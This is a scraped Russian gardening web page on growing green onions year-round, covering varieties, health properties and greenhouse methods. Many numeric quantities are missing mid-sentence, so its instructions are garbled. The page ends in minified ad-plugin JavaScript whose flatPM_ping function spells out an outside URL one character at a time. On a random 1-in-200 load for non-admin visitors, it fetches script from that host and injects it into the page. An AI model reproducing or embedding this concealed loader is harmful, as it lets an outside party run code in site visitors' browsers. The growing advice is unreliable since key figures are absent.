  • лук-батун (лук татарский, дудчатый, зимний, песчаный) дает ровную зелень. У многолетних сортов можно срезать зелень 2-3 раза за вегетацию, у однолетних – один раз;
  • многоярусный лук (канадский, египетский) – один их самых морозостойких и неприхотливых видов, превосходящий лук-батун и по качеству зелени, и по продуктивности;
  • шнитт-лук (резанец) – урожайный вид с узкими ароматными перьями высотой до 50 см, долго не грубеющими и нежными;
  • лук-слизун – скороспелый, урожайный, морозостойкий вид с плоскими широкими листьями нежной текстуры и слабым ароматом чеснока;
  • лук-порей (жемчужный) – урожайный вид с широкими сочными перьями, больше похожими на листья чеснока;
  • лук-шалот – неприхотливый урожайный вид с долго неувядающими листьями.

Лучшие сорта лука на зелень

Сорта лука, выращиваемого на перо, бывают однозачатковые, дающие совсем мало пера, и многозачатковые, образующие много зелени. К последним относятся, например, сорта Бессоновский, Ростовский, Спасский, Арзамасский, Стригуновский, Даниловский, Рязанский и другие.

Свойства зелени лука – вред и польза

Лечебные свойства лука

Как мы уже писали, зеленый лук за счет содержащихся в нем витаминов, микро– и макроэлементов помогает человеку справиться с весенним авитаминозом. Его как общеукрепляющее средство употребляют в пищу при респираторных заболеваниях. Входящие в его состав в большом количестве фитонциды очищают от вирусов и бактерий не только организм человека, но и помещение, в котором лук выращивается.

Содержащийся в зеленом луке хлорофилл в сочетании с другими полезными веществами, входящими в состав лука, способствует процессу кроветворения, поэтому зелень лука так полезна страдающим малокровием.

Богата зелень лука также эфирными маслами, эффективно уничтожающими такие инфекции и вирусы, как возбудители туберкулеза, дизентерии, ангины и дифтерита. Масла обеззараживают ротовую полость и стимулируют деятельность сердечной мышцы.

В состав зелени лука входят цинк, азот, кальций, калий, фосфор и магний, от недостатка которых могут выпадать волосы и слоиться ногтевые пластины. Кроме того, в зеленом луке содержатся такие витамины:

  • A – бета-каротин, мощный антиоксидант, отвечающий за качество зрения, ногтей, волос и кожных покровов, обеспечивающий работу сердечной мышцы и помогающий организму противостоять вредному действию свободных радикалов;
  • B1 – тиамин, необходимый для регуляции белкового, жирового и углеводного обмена;
  • B2 – рибофлавин, нейтрализующий токсины, раздражающие дыхательные пути, участвующий в образовании эритроцитов и способствующий поддержанию репродуктивной функции на должном уровне;
  • B3 – или никотиновая кислота, или витамин PP, или ниацин, поддерживающий иммунитет организма, способствующий расщеплению белков, жиров и углеводов и очищающий организм от лишнего холестерина;
  • B9 – фолиевая кислота, участвующая в синтезе белков и способствующая регуляции нервной системы;
  • C – аскорбиновая кислота, мощный антиоксидант, биологически активное вещество, участвующее в процессе синтеза гормонов и повышающее сопротивляемость организма бактериям и вирусам;
  • E – токоферол, отвечающий за плодовитость, молодость, состояние кожи, ногтей и волос, придающий им упругость и отвечающий за качество функционирования женских и мужских репродуктивных органов.

Зеленый лук – противопоказания

Не рекомендуется употребление зеленого лука в сыром виде людям, страдающим гастритом с повышенной кислотностью и язвенными болезнями пищеварительной системы. Слишком активное употребление зеленого лука может повредить гипертоникам, поскольку продукт имеет свойство повышать артериальное давление. Людям с бронхиальной астмой и заболеваниями сердечно-сосудистой системы следует отказаться от зеленого лука хотя бы в период обострения болезни.

Зеленое перо лука — круглый год

Методика выращивания зелени лука (лука на перо) в домашних и тепличных условиях круглогодично

Зеленый лук круглый год?! Почему, нет?! Ведь зелень лука — изумительная закуска, чудесная приправа, первый витаминный весенний салат. И не только весенний, ведь зеленый лук на перо можно получать круглый год, и сделать его продажу статьей дохода в приусадебном хозяйстве.

Конвейер круглогодичного поступления зеленого лука на перо удается создать при умелом использовании площадей открытого и закрытого грунта; правильном подборе видов и сортов лука для возделывания в открытом грунте и выгонки в культивационных сооружениях; строгом соблюдении требований культуры к условиям выращивания.

Кроме того, необходимо обеспечить: высокое плодородие почвы, качественный посадочный материал и его подготовку к посадке (в зависимости от места, срока и способа посадки), а также необходимую площадь питания растениям.

С апреля по сентябрь лук на перо можно выращивать в открытом фунте, а с октября по май — в защищенном (теплицах и парниках). Огородники чаще всего используют для выгонки репчатый лук, причем лучшими считаются его многозачатковые сорта, которые формируют большее количество листьев.

Для этих же целей можно выращивать лук-шалот, а также многолетние виды лука — лук-батун, многоярусный, шнитт-лук и другие. Получают перо и при выращивании репчатого лука из семян.

Выбор места для посадки

Чтобы получить перо репчатого лука в апреле, грядку готовят с осени. Желательно подобрать участок, защищенный от ветра и расположенный на южном склоне, чтобы весной почва быстро прогревалась. Почва должна быть рыхлой и плодородной.

Под перекопку вносят перегной или компост — 40 кг на 10 м 2 или минеральные удобрения из расчета по 200г суперфосфата и аммиачной селитры и 100г хлористого калия на 10 м 2 . После перекопки поверхность почвы разравнивают, в районах с избыточным увлажнением делают гряды.

Посадку проводят, когда температура почвы снизится до °С. Оптимальный срок посадки — за дней до наступления устойчивых заморозков. Способ посадки зависит от плодородия почвы.

Способы посадки

На богатых перегноем почвах делают загущенную, сплошную, так называемую мостовую посадку, размещая луковицы плотно, друг к другу. При мостовом способе посадки расходуют на 1 м 2 лука-выборка (диаметр луковиц

Можно высаживать и полумостовым способом, оставляя расстояние между луковицами На бедных почвах необходимо увеличивать площадь питания растений.

При рядовом способе посадки с междурядьем 45 см луковицы в рядках размещают на расстоянии расходуя до 0,3 кг посадочного материала на 1 м 2 . После посадки луковицы присыпают слоем земли или перегноя высотой

В марте — начале апреля с грядок сгребают снег и устанавливают пленочные каркасы. Для ускорения прорастания посадки поливают теплой водой. В период нарастания пера растения раза поливают и подкармливают.

Лучшая подкормка для быстрого нарастания зеленой массы — раствор сброженного коровяка или птичьего помета, разведенного в

Уборка урожая

Убирают лук на перо, когда листья достигают высоты В зависимости от зрелости лука, его величины, условий хранения, а также способа подготовки посадочного материала выгонка пера может продолжаться от 20 дней до 2 месяцев. Чтобы продлить срок получения пера, часть гряд не накрывают пленкой.

Продлить сроки поступления пера до поздней осени можно за счет летних, поздне-летних и ранне-осенних посадок репки в открытый грунт (с июля по сентябрь).

Уход за летними посадками заключается в своевременных поливах, рыхлении почвы, удалении сорняков и подкормках растений. Первый раз подкармливают после прорастания луковиц, второй раз — спустя используя нитроаммофоску или аммиачную селитру из расчета 20 г на 1 мг.

Лук на перо из семян

Весной перо репчатого лука получают не только из репки, но также при выращивании лука из семян, которые высевают во второй половине июля. Почву под летний посев готовят очень тщательно.

Если почва бедная, перед перекопкой обязательно вносят органические удобрения. Грядки перекапывают за недели до посева, а за дня проводят влагозарядный полив. Перед посевом рыхлят, хорошо разравнивают и слегка уплотняют почву.

Способ посева рядовой, междурядья В рядках сеют всплошную, глубина заделки семян Всходы появляются через Прореживают их в фазе настоящего листа, постепенно увеличивая расстояние между растениями до

К зиме растения успевают сформировать по настоящих листьев высотой На зиму посевы мульчируют торфом или соломой. По мерзлоталой почве весной посадки подкармливают азотными удобрениями (150 г аммиачной селитры на 10 м 2 ).

Как только листья достигнут товарной спелости высоты), приступают к уборке лука. Опаздывать с уборкой растений от летних посевов нельзя, поскольку перезимовавший лук быстро идет в стрелку.

В открытом грунте получают перо высокого качества и из лука-шалота. Агротехника его выращивания такая же, как и при выращивании пера из лука-репки. Однако рассчитывать на урожай пера шалота при высадке луковиц во второй половине лета нельзя, поскольку этот вид имеет длинный период покоя и не прорастает до весны.

Лук-батун на перо

В конвейере поступления зеленого пера важное место занимает лук-батун. Его высевают в открытый грунт в конце мая — начале июня широкополосным способом (ширина полосы 10 см, расстояние между полосами 45 см). Осенью, за недели до наступления устойчивых холодов, растения подкармливают хлористым калием (150 г на 10 м 2 ), рыхлят междурядья.

Лук батун — холодостойкое и зимостойкое растение, поэтому не требует специального укрытия на зиму, но весной для ускорения отрастания пера над посадкой устанавливают пленочное каркасное укрытие. Под пленкой перо батуна получается более нежным, поэтому всегда пользуется повышенным спросом.

Для выгонки в зимнее время используют 3—4-летние растения старых насаждений лука-батун. Осенью, перед наступлением устойчивых холодов, растения выкапывают с комом земли и переносят в теплицу. Их высаживают плотно друг к другу в грунт теплицы или под стеллажом, а также в парники.

После посадки поливают и подкармливают раствором коровяка или птичьего помета, разбавленного в Это способствует быстрому укоренению и началу отрастания пера. В период выгонки температуру в теплице поддерживают на уровне +14—16°С.

Таким же образом проводят выгонку пера шнитт-лука, используя 2—3-летние растения. К сожалению, этот вид лука огородники редко используют для выгонки, хотя он заслуживает внимания, так как образует нежное перо высокого качества.

Лук многоярусный на перо

Раньше других многолетних видов весной формирует перо и лук многоярусный. Внешне он похож на репчатый лук, но наряду с подземными луковицами у него на семенных стрелках образуются еще и воздушные луковицы, которые располагаются в Прикорневые луковицы достигают массы 20—40г и имеют по

Для получения пера используются как прикорневые, так и созревшие воздушные луковицы (обычно у них при полном созревании начинают отрастать корешки). Их высаживают на заранее подготовленные грядки. Подготовка почвы и удобрения такие же, как и для репчатого лука.

При ранних посадках (конец июля — начало августа) лук хорошо укореняется, растет, успевает накопить к зиме достаточное количество питательных веществ, а весной быстро отрастает и дает высокий урожай пера.

Посадку луковиц проводят по схеме 20—30×10—15 см. Глубина посадки Луковицы верхних ярусов и выше) высаживают в гнезда попарно. Весной, как только стает снег, луковицы отрастают, а через недели перо достигает технической (хозяйственной) спелости.

Более высокий урожай получают при использовании для выгонки не воздушных, а прикорневых луковиц. Их высаживают осенью в те же сроки, что и репчатый лук, мостовым способом. Применяют ту же агротехнику, что и при выращивании репки.

В теплицах многоярусный лук высаживают мостовым и полу-мостовым способом и выгоняют так же, как репчатый лук. Посадочный материал быстро укореняется и не нуждается в особой подготовке.

С октября по март выращивают зеленый лук в защищенном грунте. В теплицах — с октября по апрель (май), в парниках — с февраля по май.

В теплицах лук высаживают только мостовым способом. Для посадки используют также однолетний или двухлетний выборок (диаметр луковиц

Ускорению прорастания способствует подготовка посадочного материала: луковицы перед посадкой увлажняют теплой водой, укрывают мешковиной и выдерживают двое суток при температуре °С. Хороший эффект дает выдерживание посадочного материала в растворе аммиачной селитры (30 г на 10 л воды) на протяжении при температуре °С.

Ускоряет прорастание и обрезка верхушек, которые укорачивают примерно на четверть луковицы.

Как правильно высаживать лук

Норма высадки лука-выборка на м 2 . Луковицы в почву не вдавливают, а раскладывают по поверхности. В теплицах выгонку можно проводить с укрытием посадочного материала почвой (перегноем, торфом) и без укрытия. Обрезанные луковицы не засыпают почвой.

Хорошо удается зеленое перо при посадке луковиц в рассадные ящики. Используют ящики размером 40×60×6 см, имеющие стойки. Их заполняют свежим компостом, торфом или перегноем.

Посадочный материал готовят так же, как и для посадки в грунт теплицы. После высадки засыпают перегноем или торфом.

Первые до начала отрастания, ящики устанавливают в штабель, затем их размещают в теплице. Такой способ выгонки позволяет экономно использовать площадь и увеличивать срок поступления зелени, так как на место ящика, из которого продукция выбрана, можно установить другой ящик с проросшим луком.

Для получения хорошего урожая зелени лука в теплице необходимо соблюдать следующую агротехнику. В течение дней вегетации выдерживать оптимальную температуру: первые дней она должна быть днем °C, в последующие — не превышать °С (ночью соответственно на °С ниже).

Теплицы необходимо регулярно проветривать, поддерживая влажность воздуха При повышенной температуре перо растет быстрее, но растения вытягиваются и перо полегает, что снижает его товарность.

За этот период нужно провести не менее четырех поливов, чередуя их с подкормкой коровяком и минеральными удобрениями (1%-ный раствор аммиачной селитры), используя 5 л раствора на 1 м 2 . За 4 дня до уборки поливы прекращают.

С третьей декады февраля выгонку лука ведут в парниках. Почву для парника берут легкую, состоящую из равных частей перегноя и дерновой земли. Воздушное пространство между землей и рамой после набивки должно быть не менее

На стандартную парниковую раму (160×106 см) вносят 30г аммиачной селитры, 40г суперфосфата и 20 г хлористого калия.

Луковицы высаживают мостовым способом, сверху засыпая их землей или перегноем (слой До начала прорастания, особенно в пасмурные дни, парники закрывают матами.

С момента отрастания зеленого пера маты снимают: в дни, когда стоят сильные морозы, на а в теплые дни — на все светлое время. Лук поливают раз в неделю теплой водой на всю глубину слоя земли.

Убирают лук, когда зеленое перо достигает высоты Растения подкапывают, выбирают, отряхивают от земли и укладывают в ящики корнями вниз. Для улучшения товарного качества пера дно ящиков выстилают пленкой и укрывают ею растения сверху.

Болезни и вредители

При выращивании лука на зелень нельзя использовать химические препараты. А заболевания, как известно, всегда легче предупредить (соблюдая агротехнику выращивания, температурный и световой режимы), нежели лечить.

В открытом грунте зеленое перо лука может поражаться пероноспорозом с середины мая, когда гриб образует споры. Первичный источник заболевания — зараженные посадочные луковицы. Растения из таких луковиц угнетены, листья желтоватые, вялые. Споры рассеиваются воздушными течениями, с каплями дождя, заражая в короткий срок всю посадку.

При выявлении больных растений их необходимо немедленно удалить и уничтожить. Чтобы защитить растения от заболевания, луковицы перед посадкой нужно прогреть при температуре 40 °C в течение 8 часов.

Для предотвращения заболевания в защищенном грунте используют отобранный посадочный материал, подготовленный вышеописанным способом. Теплицу или парник перед высадкой в него растений нужно продезинфицировать (400 г хлорной извести залить 10 л воды и настаивать в течение 4 ч, затем жидкость слить и обильно опрыскать ею теплицу, почву, а осадок использовать для обмазывания деревянных частей культивационного сооружения).

При выявлении небольших очагов заболевания растения следует немедленно удалить, растительные остатки — собрать и уничтожить, а место очага присыпать древесной золой. После выращивания лука на зелень почву в теплице необходимо полностью заменить свежей.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};